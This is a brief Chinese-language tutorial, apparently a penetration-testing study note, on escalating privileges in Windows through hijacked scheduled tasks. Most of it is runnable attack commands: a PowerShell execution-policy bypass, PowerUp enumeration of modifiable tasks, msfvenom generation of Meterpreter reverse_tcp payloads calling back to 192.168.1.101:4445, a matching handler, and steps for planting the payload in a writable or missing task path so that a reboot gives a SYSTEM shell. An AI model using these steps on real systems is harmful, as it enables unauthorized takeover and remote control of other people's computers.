计划任务的提权

参考资料：

• https://www.youtube.com/watch?v=Kgga91U3B4s&list=PLjG9EfEtwbvIrGFTx4XctK8IxkUJkAEqP&index=13
• https://payloads.online/archivers/2018-10-08/1#0x03-%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E8%AE%A1%E5%88%92%E6%8F%90%E6%9D%83

视频教程地址：

是否有可修改的计划任务

powershell -nop -ep bypass
Import-Module C:\Users\user\Desktop\PowerUp.ps1
Get-ModifiableScheduledTaskFile

如果发现了可以修改的计划任务，那么替换为恶意程序。

学习如何使用计划任务

**Windows+R **
taskschd.msc

新建计划任务

msfvenom -l formats
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4445 -f powershell -o program.ps1

handler -H 192.168.1.101 -P 4445 -p windows/x64/meterpreter/reverse_tcp

将program.ps1作为每次开机都会运行的计划任务。重启后即可获得最高权限。

消失的计划任务

autoruns 计划任务模块，提示未找到该程序
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -w "C:\Missing Scheduled Binary\"

利用漏洞

msfconsole
handler -H 192.168.1.101 -P 4445 -p windows/x64/meterpreter/reverse_tcp

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4445 -f exe -o program.exe

将program.exe放到目录"C:\Missing Scheduled Binary\"，重启windows

即可获得反弹shell的最高权限。